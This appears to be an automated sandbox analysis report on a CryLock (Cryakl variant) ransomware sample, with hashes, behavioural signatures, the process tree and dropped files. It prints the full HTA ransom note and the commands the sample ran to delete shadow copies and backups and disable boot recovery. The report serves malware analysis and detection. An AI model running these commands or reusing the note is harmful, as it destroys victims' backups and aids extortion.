Overview

overview

10

Static

static

10

2024-06-15...kl.exe

windows7-x64

10

2024-06-15...kl.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-06-2024 00:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-06-15_6e3d30868f97949059561ef9335f536a_cryakl.exe

  • Size

    209KB

  • MD5

    6e3d30868f97949059561ef9335f536a

  • SHA1

    31c408fb8fb80f485bb99bd06214f5e8eb6e6f59

  • SHA256

    884f5e98b2621da3bd264cd99538ad17c5ed754e529fbf6ae8280de7a990d2f6

  • SHA512

    a1e98ed79aacbe6c0b61733cf0bbc8abc91e92298c337fe6421a3cbfe89202607cda746f663a654c6b6734e845fa29f99857ff5b0465c1a5f17d176918dd97de

  • SSDEEP

    3072:wPjRTnHvzG31UsczGF9Fu7/SppSH7WwmH4er1Csax00NOWmVaW0YxLjx/KitCaR:OlTPejc0pSbWA3x0cYxRiit

Score
10/10
crylockdefense_evasiondiscoveryexecutionimpactpersistenceransomwarespywarestealer

Malware Config

Extracted

Family

crylock

Attributes
  • emails

    [email protected]

    [email protected]

  • ransomnote

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var ud=0; var op=0xc7bf30; var zoc=0; function document.onkeydown() { var alt=window.event.altKey; if (event.keyCode==116 || event.keyCode==27 || alt && event.keyCode==115) { event.keyCode=0; event.cancelBubble=true; return false; } } function document.onblur() { alert('Attention! This important information for you!'); } function ChangeTime() { var sd = new Date('<%DOUBLE_DATETIME%>'); var dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('pwr'); dt.innerHTML='<font color="red" size="5"><b>Price is raised!</b></font>'; dt.style.height=78; zoc=1; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('dt'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } var sd = new Date('<%UNDECRYPT_DATETIME%>'); dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('lctw'); dt.innerHTML='<font color="red" size="5"><b>Last chance to decrypt your files!</b></font>'; zoc=2; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('et'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { document.getElementById("blumid").focus(); var bid=document.getElementById('blumid'); var bem=document.getElementById('blummail'); if (ud==0) { op=op-0x10; } else { op=op+0x10; } if (op<=0xc00000) { ud=1; } if (op>=0xc7bf30) { ud=0; } bid.style.backgroundColor=op; bem.style.backgroundColor=op; var xx=''; var i=0; while (i<19) { xx=xx+getRandomArbitrary(0,2); i=i+1; } if (zoc==0) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="white" size="5"><b>'+xx+'</b></font>'; } else { if (zoc==1) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="5"><b>Price is raised!</b></font>'; } else { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="4"><b>Price is raised!<br>Last chance to decrypt your files!</b></font>'; } } } function Start() { window.resizeTo(800,500) setInterval(ChangeTime,1000); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background-color:#0066CC;" OnLoad="Start()"> <div id="pwr" align="center" style="position:absolute; top:10px; left:10px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Payment will be raised after</b></font> <br> <div id="dt"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div align="center" style="position:absolute; top:10px; left:170px; width:58%;"> <font face="monospace" color="white" size="4"><b>Your files have been encrypted...</b></font> </div> <div align="center" style="position:absolute; top:60px; left:170px; width:58%;"> <div id="rc"> <font face="monospace" color="white" size="5"><b>00000000000000000000</b></font> </div> </div> <div id="lctw" align="center" style="position:absolute; top:10px; left:620px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Your files will be lost after</b></font> <br> <div id="et"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div style="background-color:white;overflow-x:hide; overflow-y:scroll; position:absolute; top:100px; left:10px; width:768px; height:320px"> Decrypt files? Write to this mails: <font face="monospace" OnClick="copytext('<%MAIN_CONTACT%>')"><b><%MAIN_CONTACT%></b></font> or <font face="monospace" OnClick="copytext ('<[email protected]>')"><b><[email protected]></b></font>. Reserve mail <font face="monospace" OnClick="copytext ('[email protected]')"><b>[email protected]</b></font>. <br> Your unique ID <font face="monospace" OnClick="copytext('[<%HID%>]')"><b>[<%HID%>] <font size="2">[copy]</font></b></font> <br> <font color="#ff0000 ">Warning! All your data was extracted and copied! If you don't contact us, it will be sold and uploaded to public sources!</font> </div> <div title="Click to copy" OnClick="copytext('[<%HID%>]')" id="blumid" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:10px; width:380px; height:20px"> <b>Your ID [<%HID%>] <font size="2">[copy]</font></b> </div> <div title="Click to copy" OnClick="copytext('<%MAIN_CONTACT%>')" id="blummail" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:400px; width:380px; height:20px"> <b>Write to <%MAIN_CONTACT%> <font size="2">[copy]</font></b> </div> </body> </html>

rsa_pubkey.plain

Signatures

  • Crylock

    Ransomware family, which is a new variant of Cryakl ransomware.

    ransomwarecrylock
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-06-15_6e3d30868f97949059561ef9335f536a_cryakl.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-06-15_6e3d30868f97949059561ef9335f536a_cryakl.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1912
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"
      2⤵
        PID:4584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
        2⤵
          PID:4260
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"
          2⤵
            PID:3396
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1688
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic SHADOWCOPY DELETE
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4156
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
            2⤵
              PID:5024
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
              2⤵
                PID:1388
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4624

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\$Recycle.Bin\S-1-5-21-4204450073-1267028356-951339405-1000\how_to_decrypt.hta
              Filesize

              6KB

              MD5

              784233b1612d15f1f8b38363a891d8ad

              SHA1

              554067412a1a02433e03454a487d142a3537c961

              SHA256

              b1d8b8fae2a427e10b9185c7f110b08254301c0abb9548ef1313a4fd9ad1b1ac

              SHA512

              9a0dc350fcdc2515793df73e6d3971533d1dfb0ada6916ea14e10967b0bad994bd4771cd2cf4d5ec462ebff18bcb0305276ec525f4c6b278eaa8fd56c01d7e1e

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\c-1718411635.log
              Filesize

              1KB

              MD5

              fb023191f40c97fbc07d26f002098702

              SHA1

              dde1cd74c284ea137af9b7b2d865d299b56fff26

              SHA256

              3e64e1e5fd448dda580e5813a9be7ab74706e984a8eba54b613f673a0aad6428

              SHA512

              85665586132187c5d1e77b491cd85c20f0ab6e23dbb1f0140092fdfce543a5fa6f507d6e11fec0aa429d7315249eb9abc0d94bd3fea406e9ed073e499702afee

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\c-1718411635.log
              Filesize

              4KB

              MD5

              57acd826b838ba4bcd80749cba4c138e

              SHA1

              eb3716a406233bcac20e13c18832f5fd09dfaa26

              SHA256

              457b2ec0c5528316549d5d20c6ce32a1146118d05bca019f79393a8ca640e454

              SHA512

              62b5a2c0d1ff3ccbbf6d23e708751fe215cbe2f6777eb7dcebdf90852868072344e56d50f06a6f3ca3bed7b0b8259295f32c9b7caa6e3536a5eece43c096f58e

              Download Submit

            • memory/1912-1339-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7249-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-6133-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-6408-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-6-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7201-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-1-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7353-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7354-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7355-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7356-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7603-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download

            • memory/1912-7604-0x0000000000400000-0x000000000043C000-memory.dmp

              Filesize

              240KB

              Download